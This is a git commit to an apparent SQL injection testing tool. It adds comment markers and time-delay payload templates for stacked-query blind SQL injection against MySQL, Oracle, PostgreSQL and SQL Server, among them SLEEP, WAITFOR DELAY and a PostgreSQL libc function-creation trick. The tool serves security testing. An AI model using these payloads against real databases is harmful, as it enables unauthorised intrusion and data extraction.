Initial implementation of support for stacked queries.

Added method to test for Time based blind SQL injection query stacking on the affected parameter a SLEEP() or similar DBMS specific function. Adapted libraries, plugins and XML with the above changes. Minor layout adjustments.
2026-02-10 15:36:35 +00:00 · 2008-11-12 00:36:50 +00:00
parent 13f76cfe3b
commit 81ed7c2086
12 changed files with 185 additions and 95 deletions
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -14,6 +14,15 @@
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
+        <comment query="#" query2="/*"/>
+        <!--
+             NOTE: In PHP the mysql_query() function does not permit query stacking, or executing multiple queries in a single function call.
+                   MySQL 5.0.12 introduced SLEEP() function
+                   References:
+                   * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
+                   * http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep
+        -->
+        <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(1000000, MD5('%d'))"/>
        <substring query="MID((%s), %d, %d)"/>
        <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
        <banner query="VERSION()"/>
@@ -62,6 +71,8 @@
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
+        <comment query="--"/>
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="SELECT UTL_INADDR.get_host_name('10.0.0.%d') FROM DUAL"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
@@ -109,6 +120,8 @@
        <limitstring query=" OFFSET "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <timedelay query="SELECT pg_sleep(%d)" query2="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
        <substring query="SUBSTR((%s)::text, %d, %d)"/>
        <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
        <banner query="VERSION()"/>
@@ -157,6 +170,8 @@
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
+        <comment query="--" query2="/*"/>
+        <timedelay query="WAITFOR DELAY '0:0:%d'"/>
        <substring query="SUBSTRING((%s), %d, %d)"/>
        <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
        <banner query="@@VERSION"/>